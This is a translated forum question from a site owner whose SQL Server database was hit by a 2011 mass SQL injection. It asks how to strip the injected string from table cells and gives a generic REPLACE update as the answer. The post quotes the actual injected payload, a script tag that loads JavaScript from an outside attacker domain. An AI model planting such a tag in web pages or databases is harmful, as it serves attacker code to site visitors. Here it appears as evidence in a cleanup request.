Chr*_*ris 2 sql sql-server sql-injection sql-update
不幸的是,我不幸成为最近这次袭击的受害者:http://www.theregister.co.uk/2011/10/14/mass_website_inection_grows/.我在我的数据库中的许多字段中找到了可疑代码.
每个单元格中添加的代码始终相同:
警告:不要试图加载此文件的位置,我不知道后果可能是什么但我不会对任何想要查找的人负责
</title><script src=http://nbnjki.com/urchin.js ></script>
我正在寻找一个我可以运行的查询,它将获取所选列中的每个单元格,如果找到此字符串,则将其替换为'',确保不影响单元格的现有内容.
好了我的解决方案,认为我因为刚刚意识到的紧迫感而感到恐慌,对于其他任何人:
Update dbo.authors
Set city = replace(city, 'Salt', 'Olympic');
来自http://www.sqlteam.com/article/using-replace-in-an-update-statement
| 归档时间: |
|
| 查看次数: |
5300 次 |
| 最近记录: |